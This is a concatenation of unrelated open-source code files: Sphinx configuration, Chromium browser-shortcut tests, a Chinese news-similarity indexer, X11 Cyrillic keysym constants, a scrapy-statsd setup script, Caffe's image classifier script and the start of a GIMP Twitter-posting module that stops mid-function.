# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Quiredoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Quire.tex', 'Quire Documentation',
'Paul Colomiets', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'quire', 'Quire Documentation',
['Paul Colomiets'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Quire', 'Quire Documentation',
'Paul Colomiets', 'Quire', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
mit
|
meego-tablet-ux/meego-app-browser
|
chrome/test/functional/shortcuts.py
|
3
|
8091
|
#!/usr/bin/python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import re
import pyauto_functional
import pyauto
class ShortcutsTest(pyauto.PyUITest):
"""Test for browser shortcuts.
No tests for print, save page as... shortcuts as they involve interaction
with OS native dialogs.
"""
def testNewTabShortcut(self):
"""Verify new tab shortcut."""
self.RunCommand(pyauto.IDC_NEW_TAB)
self.assertEqual(2, self.GetTabCount(), msg='Can not open a new tab.')
def testCloseTabShortcut(self):
"""Verify close tab shortcut."""
self.RunCommand(pyauto.IDC_NEW_TAB)
self.assertEqual(2, self.GetTabCount(), msg='Can not open a new tab.')
self.RunCommand(pyauto.IDC_CLOSE_TAB)
self.assertEqual(1, self.GetTabCount(), msg='Can not close a tab.')
def testReopenClosedTabShortcut(self):
"""Verify reopen closed tab shortcut opens recently closed tab."""
self.RunCommand(pyauto.IDC_NEW_TAB)
url = self.GetFileURLForPath(os.path.join(self.DataDir(), 'title2.html'))
self.NavigateToURL(url)
title = self.GetActiveTabTitle()
self.GetBrowserWindow(0).GetTab(1).Close()
self.assertEqual(1, self.GetTabCount(), msg='Can not close a tab.')
# Verify shortcut reopens the correct tab.
self.RunCommand(pyauto.IDC_RESTORE_TAB)
self.assertEqual(2, self.GetTabCount(), msg='Can not restore a tab.')
self.assertEqual(title, self.GetActiveTabTitle())
def testNewWindowShortcut(self):
"""Verify new window shortcut."""
self.RunCommand(pyauto.IDC_NEW_WINDOW)
self.assertEquals(2, self.GetBrowserWindowCount())
def testNewIncognitoWindowShortcut(self):
"""Verify new incognito window shortcut launches incognito window."""
self.RunCommand(pyauto.IDC_NEW_INCOGNITO_WINDOW)
self.assertEqual(2, self.GetBrowserWindowCount())
# Check if it is incognito by checking history.
assert not self.GetHistoryInfo().History(), 'Expecting clean history.'
url = self.GetFileURLForPath(os.path.join(self.DataDir(), 'title2.html'))
self.NavigateToURL(url, 1, 0)
self.assertEqual(0, len(self.GetHistoryInfo().History()))
def testCloseWindowShortcut(self):
"""Verify close window shortcut."""
self.RunCommand(pyauto.IDC_NEW_WINDOW)
self.assertEquals(2, self.GetBrowserWindowCount())
self.RunCommand(pyauto.IDC_CLOSE_WINDOW)
self.assertEquals(1, self.GetBrowserWindowCount())
def testFindShortcut(self):
"""Verify find in box shortcut."""
self.ApplyAccelerator(pyauto.IDC_FIND)
self.assertTrue(self.WaitUntil(lambda: self.IsFindInPageVisible()),
msg='Find in box is not visible.')
def testAlwaysShowBookmarksBarShortcut(self):
"""Verify always show bookmarks bar shortcut."""
# Show bookmark bar.
self.ApplyAccelerator(pyauto.IDC_SHOW_BOOKMARK_BAR)
self.assertTrue(self.WaitUntil(lambda: self.GetBookmarkBarVisibility()),
msg='Bookmarks bar is not visible.')
# Hide bookmark bar.
self.ApplyAccelerator(pyauto.IDC_SHOW_BOOKMARK_BAR)
self.assertTrue(self.WaitUntil(lambda:
self.GetBookmarkBarVisibility() is False),
msg='Bookmarks bar is visible.')
# TODO: Task Manager Shortcut. crbug.com/73454
def testClearBrowsingDataShortcut(self):
"""Verify clear browsing data shortcut."""
self.ApplyAccelerator(pyauto.IDC_CLEAR_BROWSING_DATA)
self.assertEquals(2, self.GetTabCount())
self.assertTrue(re.search('clearBrowserData',
self.GetActiveTabURL().spec()), 'Clear browsing data url is wrong.')
# Wait until the clear browsing data DOM UI window opens.
self.assertTrue(self.WaitUntil(lambda:
self.ExecuteJavascript(
'var element = document.getElementById("clearBrowserDataOverlay");'
'if(element) window.domAutomationController.send(element.nodeName);'
'else window.domAutomationController.send(0)', 0, 1),
expect_retval='DIV'), msg='Could not find the DOM UI window element.')
def testViewSourceShortcut(self):
"""Verify view source shortcut."""
self.ApplyAccelerator(pyauto.IDC_VIEW_SOURCE)
self.assertEqual(2, self.GetTabCount(), msg='Cannot View Source.')
self.assertEqual('view-source:about:blank', self.GetActiveTabURL().spec(),
msg='View Source URL is not correct.')
def testDeveloperToolsShortcut(self):
"""Verify developer tools shortcut opens developer tools window.."""
# Setting the pref to undock devtools so that it can be seen
# as a separate window.
self.SetPrefs(pyauto.kDevToolsOpenDocked, False)
self.ApplyAccelerator(pyauto.IDC_DEV_TOOLS)
self.assertEqual(2, self.GetBrowserWindowCount(),
msg='DevTools window is not open.')
def testJavaScriptConsoleShortcut(self):
"""Verify javascript console shortcut opens developer tools window.
We can not check if console is open or not.
We are making sure at least the shortcut launches developer tools window.
"""
# Setting the pref to undock devtools so that it can be seen
# as a separate window.
self.SetPrefs(pyauto.kDevToolsOpenDocked, False)
self.ApplyAccelerator(pyauto.IDC_DEV_TOOLS_CONSOLE)
self.assertEqual(2, self.GetBrowserWindowCount(),
msg='DevTools window is not open.')
def testHistoryShortcut(self):
"""Verify history shortcut opens history page."""
self.RunCommand(pyauto.IDC_SHOW_HISTORY)
self.assertEqual('History', self.GetActiveTabTitle(),
msg='History page was not opened.')
def testDownloadsShortcut(self):
"""Verify downloads shortcut opens downloads page."""
self.RunCommand(pyauto.IDC_SHOW_DOWNLOADS)
self.assertEqual('Downloads', self.GetActiveTabTitle(),
msg='Downloads page was not opened.')
def testHelpShortcut(self):
"""Verify help shortcut opens help page."""
self.ApplyAccelerator(pyauto.IDC_HELP_PAGE)
help_page_title = 'Google Chrome Help'
if self.IsChromeOS():
help_page_title = 'Chrome OS Help'
self.assertTrue(self.WaitUntil(lambda: self.GetActiveTabTitle(),
expect_retval=help_page_title),
msg='Google Chrome help page has not opened.')
def testSwitchingTabsShortcuts(self):
"""Verify switching tabs shortcuts."""
url1 = self.GetFileURLForDataPath('title1.html')
url2 = self.GetFileURLForDataPath('title2.html')
url3 = self.GetFileURLForDataPath('title3.html')
titles = ['title1.html', 'Title Of Awesomeness',
'Title Of More Awesomeness']
for eachurl in [url1, url2, url3]:
self.AppendTab(pyauto.GURL(eachurl))
# Switch to second tab.
self.ApplyAccelerator(pyauto.IDC_SELECT_TAB_1)
self.assertEqual(titles[0], self.GetActiveTabTitle())
# Switch to last tab.
self.ApplyAccelerator(pyauto.IDC_SELECT_LAST_TAB)
self.assertEqual(titles[2], self.GetActiveTabTitle())
# Switch to previous tab.
for x in range(len(titles)-1, -1, -1):
self.assertEquals(titles[x], self.GetActiveTabTitle())
self.RunCommand(pyauto.IDC_SELECT_PREVIOUS_TAB)
# Switch to next tab.
for x in range(0, len(titles)):
self.RunCommand(pyauto.IDC_SELECT_NEXT_TAB)
self.assertEquals(titles[x], self.GetActiveTabTitle())
def testNavigationShortcuts(self):
"""Verify back and forward navigation shortcuts from browsing history."""
url1 = self.GetFileURLForDataPath('title2.html')
url2 = self.GetFileURLForDataPath('title3.html')
for url in [url1, url2]:
self.NavigateToURL(url)
# Verify backward navigation.
self.RunCommand(pyauto.IDC_BACK)
self.assertEquals('Title Of Awesomeness', self.GetActiveTabTitle())
# Verify forward navigation.
self.RunCommand(pyauto.IDC_FORWARD)
self.assertEquals('Title Of More Awesomeness', self.GetActiveTabTitle())
# TODO: Open homepage shortcut. crbug.com/74103
if __name__ == '__main__':
pyauto_functional.Main()
|
bsd-3-clause
|
Google1234/Information_retrieva_Projectl-
|
similar_doc.py
|
1
|
11809
|
#-*- coding: UTF-8 -*-
import jieba
import config
import News_Recommend
path="data/netease"
class read_block:
def __init__(self,buff_size,filename):
self.size=buff_size
self.filename=open(filename,'r')
self.buff=self.filename.read(self.size)
self.pointer=0
        if ord(self.buff[0])==0xEF and ord(self.buff[1])==0xBB and ord(self.buff[2])==0xbf : # skip the UTF-8 BOM if present
self.last_pointer=3
else:
self.last_pointer=0
self.base_pointer=0
def read(self):
if self.last_pointer==0:
print "Error! :self.size is too small !self.buff is full,can not load new data!"
a=self.buff[self.last_pointer:]+self.filename.read(self.last_pointer)
del self.buff
self.buff=a
self.pointer-=self.last_pointer
self.base_pointer+=self.last_pointer
self.base_offset-=self.last_pointer
self.last_pointer=0
def pop_token(self):
        '''
        Return the fields of one inverted-record entry.
        :return: doc_id   document number
                 pointer  file offset (numeric)
                 length   byte count including the trailing '#####' (numeric)
        '''
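        # Record layout assumed by the parsing below (each field is terminated
        # by a '#####' delimiter): doc_id#####title#####content#####url#####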
self.base_offset=self.last_pointer
while True:#doc_id
if self.pointer==self.size:
self.read()
if self.pointer==len(self.buff):
                return -1,0,0 # the whole file has been read
if self.buff[self.pointer:self.pointer+5]=='#####':
break
self.pointer+=1
doc_id=self.buff[self.last_pointer:self.pointer]
self.last_pointer=self.pointer+5
self.pointer+=5
while True:#title
if self.pointer==self.size:
self.read()
if self.pointer==len(self.buff):
                return -1,0,0 # the whole file has been read
if self.buff[self.pointer:self.pointer+5]=='#####':
break
self.pointer+=1
#title=self.buff[self.last_pointer:self.pointer]
self.last_pointer=self.pointer+5
self.pointer+=5
while True:#content
if self.pointer==self.size:
self.read()
if self.pointer==len(self.buff):
                return -1,0,0 # the whole file has been read
if self.buff[self.pointer:self.pointer+5]=='#####':
break
self.pointer+=1
#content=self.buff[self.last_pointer:self.pointer]
self.last_pointer=self.pointer+5
self.pointer+=5
while True:#url
if self.pointer==self.size:
self.read()
if self.pointer==len(self.buff):
                return -1,0,0 # the whole file has been read
if self.buff[self.pointer:self.pointer+5]=='#####':
break
self.pointer+=1
#doc_id=self.buff[self.last_pointer:self.pointer]
self.last_pointer=self.pointer+5
self.pointer+=5
return doc_id,self.base_pointer+self.base_offset,self.pointer-self.base_offset
def pop_rest(self):
a=self.buff[self.last_pointer:]+self.filename.read(self.last_pointer)
del self.buff
self.buff=a
self.pointer=self.last_pointer=self.size
return self.buff
def close(self):
self.filename.close()
del self.pointer,self.last_pointer,self.size,self.buff,self.base_pointer
class write_block:
def __init__(self,buff_size,filename):
self.remain=self.size=buff_size
self.filename=filename
file=open(self.filename,'w')
file.close()
self.buff=''
def push(self,content):
if len(content)>self.remain:
self.buff+=content[:self.remain+1]
file=open(self.filename,'a')
file.write(self.buff)
file.close()
del self.buff
self.buff=''
self.buff+=content[self.remain+1:]
self.remain=self.size -(len(content)-self.remain)
else:
self.buff+=content
self.remain-=len(content)
def close(self):
file=open(self.filename,'a')
file.write(self.buff)
file.close()
del self.buff
self.buff=''
self.remain=self.size
def establish_document_index(input_file,buff_size,output_file):
    '''
    :param input_file: crawled web-page file
    :param buff_size: size of the read/write buffer blocks
    :param output_file: written as doc_id:pointer:length| records, where
                        pointer is the absolute file position of the record's first doc_id byte and
                        length is the byte count from that position up to the end of the url field, excluding the final '#####'
    :return:
    '''
print "process:establish document index ----->Begin"
block_read=read_block(buff_size,input_file)
block_write=write_block(buff_size,output_file)
while True:
doc_id,pointer,length=block_read.pop_token()
if doc_id==-1:
break
block_write.push(doc_id+':'+str(pointer)+':'+str(length)+'|')
block_read.close()
block_write.close()
del block_read
del block_write
print "process:establish docunment index ----->Finish"
class doc_id_index:
dic={}
def __init__(self,index_filename,data_filename,cache_size):
file=open(index_filename,'r')
self.index_file=open(data_filename,'r')
buff=file.read()
pointer=last_pointer=0
        if ord(buff[0])==0xEF and ord(buff[1])==0xBB and ord(buff[2])==0xbf : # skip the UTF-8 BOM if present
pointer=last_pointer=3
while True:
if pointer==len(buff)-1:
break
#doc_id
while True:
if buff[pointer]==':':
break
pointer+=1
doc_id=buff[last_pointer:pointer]
last_pointer=pointer+1
#doc_pointer
pointer+=1
while True:
if buff[pointer]==':':
break
pointer+=1
doc_pointer=buff[last_pointer:pointer]
last_pointer=pointer+1
#length
pointer+=1
while True:
if buff[pointer]=='|':
break
pointer+=1
length=buff[last_pointer:pointer]
last_pointer=pointer+1
self.dic[int(doc_id)]=[int(doc_pointer),int(length)]
file.close()
self.cache_size=cache_size
del buff,last_pointer,pointer,cache_size,doc_id,doc_pointer,length
        # initial load of the web-page data file
self.cache=self.index_file.read(self.cache_size)
self.cache_pointer=0
    def get_location(self,doc_id):  # returns (pointer, length) for the document record
if self.dic.has_key(doc_id):
return self.dic[doc_id][0],self.dic[doc_id][1]
else:
print "Warning:doc_id not exist! Ignore",doc_id
return -1,0
def get_data(self,doc_id):
begin_location,length=self.get_location(doc_id)
if begin_location==-1:
return '','','' #title content url
if begin_location>=self.cache_pointer and begin_location+length<=self.cache_pointer+self.cache_size:
            # serve the record from the in-memory cache
pass
else:
            # read the record from disk
if length>self.cache_size:
print "Error:cache too small!can not load data"
return '','',''
else:
del self.cache
self.index_file.seek(begin_location,0)
self.cache=self.index_file.read(self.cache_size)
self.cache_pointer=begin_location
pointer=last_pointer=begin_location-self.cache_pointer
while True:#doc_id
if self.cache[pointer:pointer+5]=='#####':
break
pointer+=1
doc_id=self.cache[last_pointer:pointer]
pointer+=5
last_pointer=pointer
while True:#title
if self.cache[pointer:pointer+5]=='#####':
break
pointer+=1
title=self.cache[last_pointer:pointer]
pointer+=5
last_pointer=pointer
while True:#content
if self.cache[pointer:pointer+5]=='#####':
break
pointer+=1
content=self.cache[last_pointer:pointer]
pointer+=5
last_pointer=pointer
while True:#url
if self.cache[pointer:pointer+5]=='#####':
break
pointer+=1
url=self.cache[last_pointer:pointer]
pointer+=5
last_pointer=pointer
return title,content,url
def close(self):
del self.cache,self.cache_size,self.cache_pointer
self.index_file.close()
class similar:
def __init__(self,index_filename,data_filename,dic_filename,inverted_index_filename,cache_size,doc_total_numbers=100000):
self.FastCos=News_Recommend.FastCosineScore(dic_filename,inverted_index_filename,cache_size,path[:-7]+config.stopword_filename,doc_total_numbers)
self.index=doc_id_index(index_filename,data_filename,cache_size)
self.punct = set(u'''/+%#:!),.:;?]}¢'"、。〉》」』】〕〗〞︰︱︳﹐、﹒
﹔﹕﹖﹗﹚﹜﹞!),.:;?|}︴︶︸︺︼︾﹀﹂﹄﹏、~¢
々‖•·ˇˉ―--′’”([{£¥'"‵〈《「『【〔〖([{£¥〝︵︷︹︻
︽︿﹁﹃﹙﹛﹝({“‘-—_…''')
self.Letters_and_numbers=set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
        # load the stopword file
self.stopword={}
buff=open(path[:-7]+config.stopword_filename,'r').read()
pointer=lastpointer=0
while pointer<len(buff):
while buff[pointer]!='\n':
pointer+=1
self.stopword[buff[lastpointer:pointer]]=1
lastpointer=pointer+1
pointer+=1
del buff,lastpointer,pointer
def calculate(self,doc_id,Top_numbers=10,multiple=10):
title,content,url=self.index.get_data(doc_id)
cut=jieba.cut_for_search(content)
word_list=[]
for word in cut:
if word not in self.punct and word not in self.Letters_and_numbers :
                # stopwords must be removed when computing document similarity, otherwise it is too slow
if self.stopword.has_key(word.encode("utf-8")):
pass
else:
word_list.append(word.encode("utf-8"))
return self.FastCos.calculate(word_list,Top_numbers,multiple)
def write_to_file(self,total_doc_numbers,filename):
print "process :calculate similar files +store into file---->>>>"
block_write=write_block(config.buff_size,filename)
for id in range(1,total_doc_numbers):
TopK=self.calculate(id,config.recommand_numbers)
block_write.push(str(id))
for j in TopK :
                if j!=id:  # the result count is config.recommand_numbers+1; the most similar document may be the document itself
block_write.push(':'+str(j))
block_write.push('|')
print id
block_write.close()
del block_write
print "process :caiculate similar files +store into file---->>>>Finish"
def close(self):
del self.FastCos,self.index,self.punct,self.Letters_and_numbers
|
mit
|
python-xlib/python-xlib
|
Xlib/keysymdef/cyrillic.py
|
14
|
2540
|
XK_Serbian_dje = 0x6a1
XK_Macedonia_gje = 0x6a2
XK_Cyrillic_io = 0x6a3
XK_Ukrainian_ie = 0x6a4
XK_Ukranian_je = 0x6a4
XK_Macedonia_dse = 0x6a5
XK_Ukrainian_i = 0x6a6
XK_Ukranian_i = 0x6a6
XK_Ukrainian_yi = 0x6a7
XK_Ukranian_yi = 0x6a7
XK_Cyrillic_je = 0x6a8
XK_Serbian_je = 0x6a8
XK_Cyrillic_lje = 0x6a9
XK_Serbian_lje = 0x6a9
XK_Cyrillic_nje = 0x6aa
XK_Serbian_nje = 0x6aa
XK_Serbian_tshe = 0x6ab
XK_Macedonia_kje = 0x6ac
XK_Byelorussian_shortu = 0x6ae
XK_Cyrillic_dzhe = 0x6af
XK_Serbian_dze = 0x6af
XK_numerosign = 0x6b0
XK_Serbian_DJE = 0x6b1
XK_Macedonia_GJE = 0x6b2
XK_Cyrillic_IO = 0x6b3
XK_Ukrainian_IE = 0x6b4
XK_Ukranian_JE = 0x6b4
XK_Macedonia_DSE = 0x6b5
XK_Ukrainian_I = 0x6b6
XK_Ukranian_I = 0x6b6
XK_Ukrainian_YI = 0x6b7
XK_Ukranian_YI = 0x6b7
XK_Cyrillic_JE = 0x6b8
XK_Serbian_JE = 0x6b8
XK_Cyrillic_LJE = 0x6b9
XK_Serbian_LJE = 0x6b9
XK_Cyrillic_NJE = 0x6ba
XK_Serbian_NJE = 0x6ba
XK_Serbian_TSHE = 0x6bb
XK_Macedonia_KJE = 0x6bc
XK_Byelorussian_SHORTU = 0x6be
XK_Cyrillic_DZHE = 0x6bf
XK_Serbian_DZE = 0x6bf
XK_Cyrillic_yu = 0x6c0
XK_Cyrillic_a = 0x6c1
XK_Cyrillic_be = 0x6c2
XK_Cyrillic_tse = 0x6c3
XK_Cyrillic_de = 0x6c4
XK_Cyrillic_ie = 0x6c5
XK_Cyrillic_ef = 0x6c6
XK_Cyrillic_ghe = 0x6c7
XK_Cyrillic_ha = 0x6c8
XK_Cyrillic_i = 0x6c9
XK_Cyrillic_shorti = 0x6ca
XK_Cyrillic_ka = 0x6cb
XK_Cyrillic_el = 0x6cc
XK_Cyrillic_em = 0x6cd
XK_Cyrillic_en = 0x6ce
XK_Cyrillic_o = 0x6cf
XK_Cyrillic_pe = 0x6d0
XK_Cyrillic_ya = 0x6d1
XK_Cyrillic_er = 0x6d2
XK_Cyrillic_es = 0x6d3
XK_Cyrillic_te = 0x6d4
XK_Cyrillic_u = 0x6d5
XK_Cyrillic_zhe = 0x6d6
XK_Cyrillic_ve = 0x6d7
XK_Cyrillic_softsign = 0x6d8
XK_Cyrillic_yeru = 0x6d9
XK_Cyrillic_ze = 0x6da
XK_Cyrillic_sha = 0x6db
XK_Cyrillic_e = 0x6dc
XK_Cyrillic_shcha = 0x6dd
XK_Cyrillic_che = 0x6de
XK_Cyrillic_hardsign = 0x6df
XK_Cyrillic_YU = 0x6e0
XK_Cyrillic_A = 0x6e1
XK_Cyrillic_BE = 0x6e2
XK_Cyrillic_TSE = 0x6e3
XK_Cyrillic_DE = 0x6e4
XK_Cyrillic_IE = 0x6e5
XK_Cyrillic_EF = 0x6e6
XK_Cyrillic_GHE = 0x6e7
XK_Cyrillic_HA = 0x6e8
XK_Cyrillic_I = 0x6e9
XK_Cyrillic_SHORTI = 0x6ea
XK_Cyrillic_KA = 0x6eb
XK_Cyrillic_EL = 0x6ec
XK_Cyrillic_EM = 0x6ed
XK_Cyrillic_EN = 0x6ee
XK_Cyrillic_O = 0x6ef
XK_Cyrillic_PE = 0x6f0
XK_Cyrillic_YA = 0x6f1
XK_Cyrillic_ER = 0x6f2
XK_Cyrillic_ES = 0x6f3
XK_Cyrillic_TE = 0x6f4
XK_Cyrillic_U = 0x6f5
XK_Cyrillic_ZHE = 0x6f6
XK_Cyrillic_VE = 0x6f7
XK_Cyrillic_SOFTSIGN = 0x6f8
XK_Cyrillic_YERU = 0x6f9
XK_Cyrillic_ZE = 0x6fa
XK_Cyrillic_SHA = 0x6fb
XK_Cyrillic_E = 0x6fc
XK_Cyrillic_SHCHA = 0x6fd
XK_Cyrillic_CHE = 0x6fe
XK_Cyrillic_HARDSIGN = 0x6ff
|
lgpl-2.1
|
vinayan3/scrapy-statsd
|
setup.py
|
1
|
1505
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='scrapy-statsd',
version='1.0.1',
description='Publish Scrapy stats to statsd',
long_description=long_description,
url='https://github.com/vinayan3/scrapy-statsd',
author='Vinay Anantharaman',
author_email='[email protected]',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='scrapy stats stats',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
install_requires=[
'six',
'Scrapy>=1.0.5',
'statsd==3.2.1'
],
extras_require={
'dev': [],
'test': ['mock==1.3.0'],
},
)
|
mit
|
sichenucsd/caffe_si
|
python/classify.py
|
31
|
3625
|
#!/usr/bin/env python
"""
classify.py is an out-of-the-box image classifier callable from the command line.
By default it configures and runs the Caffe reference ImageNet model.
"""
import numpy as np
import os
import sys
import argparse
import glob
import time
import caffe
def main(argv):
pycaffe_dir = os.path.dirname(__file__)
parser = argparse.ArgumentParser()
# Required arguments: input and output files.
parser.add_argument(
"input_file",
help="Input image, directory, or npy."
)
parser.add_argument(
"output_file",
help="Output npy filename."
)
# Optional arguments.
parser.add_argument(
"--model_def",
default=os.path.join(pycaffe_dir,
"../examples/imagenet/imagenet_deploy.prototxt"),
help="Model definition file."
)
parser.add_argument(
"--pretrained_model",
default=os.path.join(pycaffe_dir,
"../examples/imagenet/caffe_reference_imagenet_model"),
help="Trained model weights file."
)
parser.add_argument(
"--gpu",
action='store_true',
help="Switch for gpu computation."
)
parser.add_argument(
"--center_only",
action='store_true',
help="Switch for prediction from center crop alone instead of " +
"averaging predictions across crops (default)."
)
parser.add_argument(
"--images_dim",
default='256,256',
help="Canonical 'height,width' dimensions of input images."
)
parser.add_argument(
"--mean_file",
default=os.path.join(pycaffe_dir,
'caffe/imagenet/ilsvrc_2012_mean.npy'),
help="Data set image mean of H x W x K dimensions (numpy array). " +
"Set to '' for no mean subtraction."
)
parser.add_argument(
"--input_scale",
type=float,
default=255,
help="Multiply input features by this scale before input to net"
)
parser.add_argument(
"--channel_swap",
default='2,1,0',
help="Order to permute input channels. The default converts " +
"RGB -> BGR since BGR is the Caffe default by way of OpenCV."
)
parser.add_argument(
"--ext",
default='jpg',
help="Image file extension to take as input when a directory " +
"is given as the input file."
)
args = parser.parse_args()
image_dims = [int(s) for s in args.images_dim.split(',')]
channel_swap = [int(s) for s in args.channel_swap.split(',')]
# Make classifier.
classifier = caffe.Classifier(args.model_def, args.pretrained_model,
image_dims=image_dims, gpu=args.gpu, mean_file=args.mean_file,
input_scale=args.input_scale, channel_swap=channel_swap)
if args.gpu:
print 'GPU mode'
# Load numpy array (.npy), directory glob (*.jpg), or image file.
args.input_file = os.path.expanduser(args.input_file)
if args.input_file.endswith('npy'):
inputs = np.load(args.input_file)
elif os.path.isdir(args.input_file):
inputs =[caffe.io.load_image(im_f)
for im_f in glob.glob(args.input_file + '/*.' + args.ext)]
else:
inputs = [caffe.io.load_image(args.input_file)]
print "Classifying %d inputs." % len(inputs)
# Classify.
start = time.time()
predictions = classifier.predict(inputs, not args.center_only)
print "Done in %.2f s." % (time.time() - start)
# Save
np.save(args.output_file, predictions)
if __name__ == '__main__':
main(sys.argv)
|
bsd-2-clause
|
J216/gimp_be
|
gimp_be/core.py
|
1
|
27568
|
import gimp
from gimp import pdb
from settings import *
from network import *
from image import *
from utils import *
from draw import *
from paint import *
from collections import Counter
import TwitterAPI
from random import randrange, choice, shuffle
from string import letters
import datetime as dt
from time import sleep
def setTwitterAPIKeys(ACCESS_TOKEN_KEY="NOT_SET",CONSUMER_KEY="NOT_SET",CONSUMER_SECRET="NOT_SET",ACCESS_TOKEN_SECRET="NOT_SET"):
global settings_data
if not ACCESS_TOKEN_KEY == "NOT_SET":
settings_data['twitter']['ACCESS_TOKEN_KEY']=ACCESS_TOKEN_KEY
settings_data['twitter']['CONSUMER_KEY']=CONSUMER_KEY
settings_data['twitter']['CONSUMER_SECRET']=CONSUMER_SECRET
settings_data['twitter']['ACCESS_TOKEN_SECRET']=ACCESS_TOKEN_SECRET
saveSettings()
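# Usage sketch for setTwitterAPIKeys (the credential values are placeholders):
#   setTwitterAPIKeys(ACCESS_TOKEN_KEY='token', CONSUMER_KEY='key',
#                     CONSUMER_SECRET='secret', ACCESS_TOKEN_SECRET='token-secret')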
def addHashtag(tag):
#add hashtag to settings
global settings_data
settings_data['twitter']['hashtags']=settings_data['twitter']['hashtags']+u' #'+unicode(tag, "utf-8")
saveSettings()
def removeHashtag(tag):
    # remove a hashtag from settings and rebuild the stored hashtag string
global settings_data
hashtags=map(str, settings_data['twitter']['hashtags'].split('#')[1:])
hashtags=map(str.strip, hashtags)
if tag in hashtags:
hashtags.remove(tag)
rt=''
for hashtag in hashtags:
rt=rt+'#'+hashtag + ' '
rt.strip()
settings_data['twitter']['hashtags']=rt
saveSettings()
return True
else:
return False
def hashtagString(length=140,mode=0):
#return string of hashtags filling given character space
global settings_data
hashtags=settings_data['twitter']['hashtags'].split('#')[1:]
hs=''
ll=[]
for item in hashtags:
if len(item)+2<=length:
ll.append(item)
ll.sort(key=len)
while length > len(ll[0]) and len(ll) > 0:
il=[]
for item in ll:
if len(item)+2<=length:
il.append(item)
shuffle(il)
if not len(il)==0:
nh=il.pop()
if len(nh)+2<=length:
length=length-len(nh)-2
hs=hs+'#'+nh.strip()+' '
if nh in ll:
ll.remove(nh)
if len(ll)<1:
return str(hs).strip()
return str(hs).strip()
def setDefaultTweet(default_tweet='GIMP-Python tweet!'):
global settings_data
settings_data['twitter']['default_tweet']=unicode(default_tweet, "utf-8")
saveSettings()
def tweetText(opt=0):
global settings_data
now = dt.datetime.now()
updateLocationData()
title = imageTitle(2)
city = settings_data["location"]["city"]
state = settings_data["location"]["state"]
host_name = settings_data["network"]["host_name"]
tempf = settings_data["location"]["tempf"]
weather = settings_data["location"]["weather"]
hashtags = settings_data["twitter"]["hashtags"]
time_stamp = str(dt.datetime.now())
tweet_text = ''
if opt == 0:
tweet_text = title + '\nby ' + settings_data['user']['author'] + '\n' + city + ' ' + state + ' | ' + host_name + '\n' + tempf + 'F ' + weather + '\n' + now.strftime("%A %B %d - %I:%M%p")
elif opt == 1:
tweet_text = title + '\nby ' + settings_data['user']['author'] + ' ' + time_stamp[:4] + '\n'
else:
tweet_text = title + '\nby ' + settings_data['user']['author'] + ' ' + time_stamp[:4]
